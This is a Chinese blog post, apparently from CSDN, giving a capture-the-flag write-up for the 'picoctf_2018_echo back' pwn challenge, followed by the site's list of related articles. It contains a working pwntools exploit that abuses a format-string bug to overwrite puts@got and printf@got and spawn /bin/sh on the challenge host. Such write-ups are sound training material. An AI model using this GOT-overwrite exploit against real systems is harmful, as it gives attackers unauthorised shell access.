picoctf_2018_echo back

最新推荐文章于 2024-08-09 13:55:52 发布
最新推荐文章于 2024-08-09 13:55:52 发布
阅读量41 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132973229
版权

picoctf_2018_echo back

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)

32位,没开pie,可改got表

unsigned int vuln()
{
  char buf[128]; // [esp+Ch] [ebp-8Ch] BYREF
  unsigned int v2; // [esp+8Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  memset(buf, 0, sizeof(buf));
  system("echo input your message:");
  read(0, buf, 0x7Fu);
  printf(buf);
  puts("\n");
  puts("Thanks for sending the message!");
  return __readgsdword(0x14u) ^ v2;
}

有system,并且存在格式化字符串漏洞,很明显改got然后写/bin/sh就行

思路

#aaaa%p-%p-%p-%p-%p-%p-%p-%p

测出偏移为7,然后后面有puts函数,将puts@got改成vuln函数,让他一直循环

然后改printf@got-->system然后再写入/bin/sh

from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')
r,elf=rec("node4.buuoj.cn",27709,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048604')

#aaaa%p-%p-%p-%p-%p-%p-%p-%p 7
pl=fmtstr_payload(7,{elf.got['puts']:0x80485AB})
sla(b'input your message:\n',pl)
pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sla(b'input your message:\n',pl)
sla(b'input your message:\n',b'/bin/sh\x00')
ia(c)

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2868
BUUCTF picoctf_2018_echo back
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 339
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
miniSpirit.github.io
03-31
miniSpirit.github.io
攻防世界PWN之echo_back题解
seaaseesa的博客
11-17 2455
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
[BUUCTF-pwn]——picoctf_2018_echo back
Y_peak的博客
04-03 394
[BUUCTF-pwn]——picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1 思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好 找偏移, 为7 不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。 exploit from pwn import* p=remote('node3.buuoj.cn',27945)
uart_echo.rar_Echo Echo
09-23
"Echo Echo"项目显然涉及到通过UART接口实现数据的回显功能,即设备接收到的数据会被原样返回。这个过程有助于调试通信链路,确保数据正确传输。 在UART通信中,数据通常以字节流的形式发送,每字节包含8位数据,...
uart_echo.zip_Echo Echo_echo测试串口_uartecho
09-20
"Echo Echo_echo测试串口_uartecho"指的是通过UART接口进行的回环测试,这是一种验证UART通信是否正常的基本方法。在这个场景中,LM4FLaunchpad是一款基于德州仪器(TI)LM4F微控制器的开发板,它内置了UART功能,...
aes.rar_Echo Echo_acoustic echo
09-24
标题中的"aes.rar_Echo Echo_acoustic echo"表明这是一个与AES(Acoustic Echo Cancellation)技术相关的压缩包,其中可能包含了一些关于消除回声的音频处理资料。"Echo Echo_acoustic echo"这部分可能是对主题的...
tcpecho.zip_Echo Echo_echo server_echotcpip
09-22
【TCP/IP Echo 服务器原理与实现】 在计算机网络通信中,Echo 服务器是一种常见的测试工具,它接收客户端发送的数据并原样返回,主要用于检查网络连接的可靠性。"tcpecho.zip" 包含了一个基于 TCP/IP 实现的 Echo ...
lfd.rar_Echo Echo
09-20
`Echo Echo`这个标题可能指的是一个项目或工具,它与Linux内核配置文件`.config`的处理有关。`.config`文件是Linux内核编译时的配置选项,包含了内核支持的功能模块和参数,这些设置直接影响到内核的性能和功能。...
域名安全详解
TechEnthusiast的博客
08-06 136
域名安全是网络安全的重要组成部分,涉及多个方面。
【CVE-2024-38077】核弹级Windows RCE漏洞如何自检并修复该漏洞(附批量漏洞检测工具及分析伪代码)
最新发布
m0_62783065的博客
08-09 3987
【CVE-2024-38077】核弹级RCE漏洞如何自检并修复该漏洞(附原文内分析伪代码)
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 826
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 441
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1098
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 155
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
8月5日学习笔记 glibc安装与安全用户角色权限
weixin_70751701的博客
08-05 1157
安装步骤1.安装依赖库# 添加开机启动Enter password: # 输⼊123or \g.or \g.#重启服务# 有套接字⽂件,就可以链接mysql服务or \g.owners.Type 'help;mysql>```
module sr04( input clk , input rst_n , input echo , output wire trig , output echo_d, output [7:0] distance ); parameter INTERVAL = 5_000_000; //100ms reg [22:0] cnt ; reg [24:0] echo_cnt_reg[3:0], echo_cnt; wire [21:0] echo_mean; reg [1:0] addr; reg echo_1,echo_2; wire echo_flag; wire echo_h; assign echo_h = (~echo_2) & echo_1; assign echo_d = (~echo_1) & echo_2; assign trig = (cnt < 500) ? 1 : 0; assign distance = echo_mean * 78 / 1_000_000; assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr <= 0; echo_cnt_reg[0] <= 0; echo_cnt_reg[1] <= 0; echo_cnt_reg[2] <= 0; echo_cnt_reg[3] <= 0; end else if(echo_d)begin echo_cnt_reg[addr] <= echo_cnt; if(addr == 3) addr <= 0; else addr <= addr + 1; end else begin addr <= addr; echo_cnt_reg[addr] <= echo_cnt_reg[addr]; end end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin cnt <= 0; end else if(cnt == INTERVAL) cnt <= 0; else cnt <= cnt + 1'b1; end always @(posedge clk or negedge rst_n) begin if(!rst_n)begin echo_1 <= 0; echo_2 <= 0; end else begin echo_1 <= echo ; echo_2 <= echo_1; end end always @(posedge clk or negedge rst_n) begin if(!rst_n) echo_cnt <= 0; else if(!cnt) echo_cnt <= 0; else if(echo) echo_cnt <= echo_cnt + 1; else echo_cnt <= echo_cnt; end endmodule 分析其中的核心代码及其功能
06-07
这是一个用于超声波测距的模块,其中的核心代码是: ``` assign trig = (cnt < 500) ? 1 : 0; assign distance = echo_mean * 78 / 1_000_000; assign echo_mean = (echo_cnt_reg[0]+echo_cnt_reg[1]+echo_cnt_reg[2]+echo_cnt_reg[3]) >> 2; always @(posedge clk or negedge rst_n) begin if(!rst_n)begin addr <= 0; echo_cnt_reg[0] <= 0; echo_cnt_reg[1] <= 0; echo_cnt_reg[2] <= 0; echo_cnt_reg[3] <= 0; end else if(echo_d)begin echo_cnt_reg[addr] <= echo_cnt; if(addr == 3) addr <= 0; else addr <= addr + 1; end else begin addr <= addr; echo_cnt_reg[addr] <= echo_cnt_reg[addr]; end end ``` 其中,`trig`是控制超声波发射的信号,当`cnt`小于500时,`trig`为1,否则为0。`distance`是计算出的距离值,通过将`echo_mean`乘以78再除以1,000,000得到。`echo_mean`是计算出的4个回波信号的平均值,通过将4个寄存器中的值相加除以4得到。 在`always`块中,首先根据`rst_n`信号来进行复位操作;然后根据`echo_d`信号来将当前的回波信号计数值存入对应的寄存器中,同时更新`addr`的值,以便下一次存入另一个寄存器;最后,如果没有回波信号,则不进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值